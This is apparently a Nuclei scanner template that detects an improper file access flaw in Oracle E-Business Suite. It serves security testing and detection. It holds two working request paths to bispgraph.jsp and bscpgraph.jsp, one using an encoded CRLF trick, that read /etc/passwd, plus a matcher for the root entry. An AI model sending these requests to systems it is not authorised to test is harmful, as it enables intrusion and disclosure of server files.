id: oracle-ebs-bispgrapgh-file-read info: name: Oracle eBusiness Suite - Improper File Access author: emenalf,tirtha_mandal,thomas_from_offensity severity: critical description: | Oracle eBusiness Suite is susceptible to improper file access vulnerabilities via bispgrapgh. Be aware this product is no longer supported with patches or security fixes. reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf metadata: max-request: 2 tags: oracle,lfi http: - method: GET path: - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/" - "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd" matchers: - type: regex part: body regex: - "root:.*:0:0:" # digest: 4a0a00473045022100fbbf6908bb5d9d369de5b3fcf3b7acd39c30675a537f009f8af9d245ba17c35502203f024d249bd881e0fae0714724b18e6f7609def0fc74eea96734e597f8d3406e:922c64590222798bb761d5b6d8e72950